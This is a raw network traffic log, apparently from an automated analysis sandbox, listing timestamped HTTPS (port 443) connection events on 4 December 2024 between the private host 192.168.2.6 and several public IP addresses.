                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.016223907 CET50096443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.016443014 CET4435009623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.019781113 CET50098443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.019793987 CET4435009823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.020055056 CET50096443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.020061970 CET4435009623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.025530100 CET4435009823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.025620937 CET50098443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.033796072 CET50095443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.033819914 CET50100443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.051456928 CET50098443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.051779985 CET4435009823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.052042961 CET50098443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.052053928 CET4435009823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.066637039 CET50096443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.095572948 CET50098443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.115689039 CET4435009318.164.116.57192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.115772009 CET4435009318.164.116.57192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.115941048 CET50093443192.168.2.618.164.116.57
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.122456074 CET50093443192.168.2.618.164.116.57
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.122482061 CET4435009318.164.116.57192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.124494076 CET50104443192.168.2.618.164.116.57
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.124562979 CET4435010418.164.116.57192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.124712944 CET50104443192.168.2.618.164.116.57
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.124953032 CET50104443192.168.2.618.164.116.57
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.124973059 CET4435010418.164.116.57192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.162467003 CET4435008413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.162492990 CET4435008413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.162570953 CET50084443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.162586927 CET4435008413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.164777040 CET50084443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.165179968 CET50105443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.165219069 CET4435010513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.165281057 CET50105443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.165740013 CET50105443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.165747881 CET4435010513.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.167377949 CET4435008413.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.167453051 CET50084443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.172926903 CET4435009220.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.173019886 CET4435009220.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.174841881 CET50092443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.177726030 CET50092443192.168.2.620.110.205.119
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.177763939 CET4435009220.110.205.119192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.250478029 CET44350091104.208.16.91192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.250551939 CET44350091104.208.16.91192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.250612974 CET50091443192.168.2.6104.208.16.91
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.267757893 CET50091443192.168.2.6104.208.16.91
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.267802954 CET44350091104.208.16.91192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.356589079 CET4435009423.96.180.189192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.356676102 CET4435009423.96.180.189192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.356859922 CET50094443192.168.2.623.96.180.189
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.358614922 CET50094443192.168.2.623.96.180.189
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.358638048 CET4435009423.96.180.189192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.368144035 CET50106443192.168.2.623.96.180.189
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.368200064 CET4435010623.96.180.189192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.368338108 CET50106443192.168.2.623.96.180.189
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.368576050 CET50106443192.168.2.623.96.180.189
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.368582964 CET4435010623.96.180.189192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.374068022 CET4435009923.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.374094963 CET4435009923.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.374150991 CET4435009923.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.374195099 CET50099443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.376590014 CET50099443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.376605988 CET4435009923.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.408401012 CET4435009523.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.408493042 CET4435009523.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.408580065 CET50095443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.410695076 CET50095443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.410720110 CET4435009523.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.413681030 CET4435010023.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.413710117 CET4435010023.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.413717031 CET4435010023.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.413759947 CET50100443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.413779020 CET4435010023.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.413796902 CET4435010023.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.413851976 CET50100443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.414762974 CET50100443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.414771080 CET4435010023.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.433844090 CET4435008813.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.433878899 CET4435008813.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.433931112 CET50088443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.433958054 CET4435008813.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.433971882 CET4435008813.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.434021950 CET50088443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.435220957 CET50088443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.435240984 CET4435008813.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.435626030 CET50107443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.435655117 CET4435010713.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.435704947 CET50107443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.436244011 CET50107443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.436258078 CET4435010713.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.443205118 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.443434000 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.444432974 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.444444895 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.444495916 CET4435008913.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.444526911 CET4435008913.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.444572926 CET50089443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.444597960 CET4435008913.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.444659948 CET4435008913.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.444776058 CET50089443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.448003054 CET50089443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.448024035 CET4435008913.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.448159933 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.448170900 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.448283911 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.448306084 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.448451042 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.448473930 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.448590994 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.448635101 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.448740005 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.448755980 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.449008942 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.449021101 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.449445963 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.449459076 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.449521065 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.449528933 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.449556112 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.449563026 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.449584007 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.449594975 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.449641943 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.449649096 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.449668884 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.449677944 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.449693918 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.449702024 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.449975014 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.449987888 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450011015 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450020075 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450030088 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450035095 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450040102 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450045109 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450061083 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450067997 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450122118 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450134993 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450146914 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450150967 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450169086 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450175047 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450279951 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450289011 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450304985 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450319052 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450336933 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450350046 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450395107 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450412989 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450433016 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450474024 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450484991 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450505972 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450517893 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450670004 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450764894 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450773954 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.450800896 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.471878052 CET4435009623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.471913099 CET4435009623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.471920967 CET4435009623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.471988916 CET50096443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.472027063 CET4435009623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.472098112 CET4435009623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.472148895 CET50096443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.473854065 CET50096443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.473875999 CET4435009623.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.482949018 CET4435008713.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.486324072 CET4435008713.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.486378908 CET50087443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.486403942 CET4435008713.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.486422062 CET4435008713.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.486471891 CET50087443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.489996910 CET50087443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.490022898 CET4435008713.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.492639065 CET4435009823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.492660046 CET4435009823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.492726088 CET4435009823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.492724895 CET50098443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.492777109 CET50098443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.495326042 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.499425888 CET4435009013.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.499449015 CET4435009013.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.499509096 CET50090443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.499527931 CET4435009013.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.499705076 CET4435009013.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.502214909 CET50090443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.525816917 CET50090443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.525835991 CET4435009013.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.526211023 CET50098443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.526247025 CET4435009823.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.531284094 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.531548977 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.531598091 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.531634092 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.531685114 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.531691074 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.531716108 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.531727076 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.531743050 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.531785011 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.531835079 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.535478115 CET4435008613.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.535505056 CET4435008613.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.535573006 CET50086443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.535588026 CET4435008613.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.538479090 CET50086443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.539393902 CET4435008613.107.246.40192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.539450884 CET50086443192.168.2.613.107.246.40
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.546041965 CET4435009723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.546068907 CET4435009723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.546078920 CET4435009723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.546108007 CET4435009723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.546123028 CET4435009723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.546133041 CET50097443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.546139956 CET4435009723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.546166897 CET4435009723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.546212912 CET50097443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.546226025 CET50097443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.571335077 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.581585884 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.581623077 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.581685066 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.581693888 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.581716061 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.581727028 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.581739902 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.581779003 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.581788063 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.581804991 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.582053900 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.582072973 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.609219074 CET4435009723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.609246969 CET4435009723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.609297037 CET50097443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.609311104 CET4435009723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.609375000 CET50097443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.616906881 CET4435009723.57.90.101192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.616981030 CET50097443192.168.2.623.57.90.101
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.623332977 CET44350103159.69.102.165192.168.2.6
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.623564005 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.623605967 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.623622894 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.623637915 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.623646021 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.623682976 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.623692989 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.623703957 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.623737097 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.623800993 CET50103443192.168.2.6159.69.102.165
                                                                                                                                                                                                                                                                                                    Dec 4, 2024 02:02:29.623835087 CET50103443192.168.2.6159.69.102.165
